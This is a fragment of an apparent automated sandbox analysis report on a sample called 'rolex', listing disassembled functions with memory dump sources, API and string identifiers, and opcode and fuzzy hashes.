                                                                                • Associated: 00000003.00000002.2047974659.00007FF7AB490000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048021052.00007FF7AB4D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4EB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4F4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ff7ab490000_rolex.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo_noreturn
                                                                                • String ID: DXGIDebug.dll
                                                                                • API String ID: 3668304517-540382549
                                                                                • Opcode ID: 9b611769b57abaa4d1aa37b6f78c1b95125875c5bdd6e0a23bce2da3a8b598ec
                                                                                • Instruction ID: 454f89906e72b31aed470d84475fe7de32ed1ceb048b3f1cc3df03fd9c73e6bd
                                                                                • Opcode Fuzzy Hash: 9b611769b57abaa4d1aa37b6f78c1b95125875c5bdd6e0a23bce2da3a8b598ec
                                                                                • Instruction Fuzzy Hash: 7B71AE72A15B8186EB14DF69E4403ADB3A8FB54B94F854236DBAC07BB9DF78E051C310
                                                                                Function 00007FF7AB4A9408 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 108COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2047990803.00007FF7AB491000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7AB490000, based on PE: true
                                                                                • Associated: 00000003.00000002.2047974659.00007FF7AB490000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048021052.00007FF7AB4D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4EB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4F4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ff7ab490000_rolex.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo_noreturn$swprintf
                                                                                • String ID: SIZE
                                                                                • API String ID: 449872665-3243624926
                                                                                • Opcode ID: 1ee6a6b9fbbd6c3126f8bc5ffec1b6aa008f2877db1f13591811bbd6ed408201
                                                                                • Instruction ID: a35e35843962edbd4a79e7bd21484bce58f9c241c43890b47c3a7a758a1d67a8
                                                                                • Opcode Fuzzy Hash: 1ee6a6b9fbbd6c3126f8bc5ffec1b6aa008f2877db1f13591811bbd6ed408201
                                                                                • Instruction Fuzzy Hash: C541D763A1A74285EE10EB2CE4453BDA360EF86790FD24235EB9D066F6EE3CD540C710
                                                                                Function 00007FF7AB4B9B40 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 104COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2047990803.00007FF7AB491000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7AB490000, based on PE: true
                                                                                • Associated: 00000003.00000002.2047974659.00007FF7AB490000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048021052.00007FF7AB4D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4EB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4F4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ff7ab490000_rolex.jbxd
                                                                                Similarity
                                                                                • API ID: Item$Text$Dialog
                                                                                • String ID: ASKNEXTVOL
                                                                                • API String ID: 2638039312-3402441367
                                                                                • Opcode ID: 75a4ef6a6cdb84fc8c98b7401f85638b76a9530d4b428818baa7d4c6ec3066de
                                                                                • Instruction ID: cbfc645b752ffe61319af7b9aff4516a33861ec1cfd5521e7bee6d8afa7e5f65
                                                                                • Opcode Fuzzy Hash: 75a4ef6a6cdb84fc8c98b7401f85638b76a9530d4b428818baa7d4c6ec3066de
                                                                                • Instruction Fuzzy Hash: 82417422A0E68281FA54BB6DE5501B9A3A1AF85BC0FD60035DF4D077B9DF3DE9518360
                                                                                Function 00007FF7AB4AA43C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2047990803.00007FF7AB491000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7AB490000, based on PE: true
                                                                                • Associated: 00000003.00000002.2047974659.00007FF7AB490000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048021052.00007FF7AB4D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4EB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4F4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ff7ab490000_rolex.jbxd
                                                                                Similarity
                                                                                • API ID: FindHandleModuleResource
                                                                                • String ID: RTL
                                                                                • API String ID: 3537982541-834975271
                                                                                • Opcode ID: e39cf6139d6c3c808756c827088780cb49cd2dd94430b396554b51375d39015a
                                                                                • Instruction ID: 4c5e3a905fc6aa8a8e1b1033231d8dab9147bc951d42f337390771cf95d2b608
                                                                                • Opcode Fuzzy Hash: e39cf6139d6c3c808756c827088780cb49cd2dd94430b396554b51375d39015a
                                                                                • Instruction Fuzzy Hash: E9D05B51F0B74241FF596779644533457505F18B41FC94038C80D06371EE2CD088C760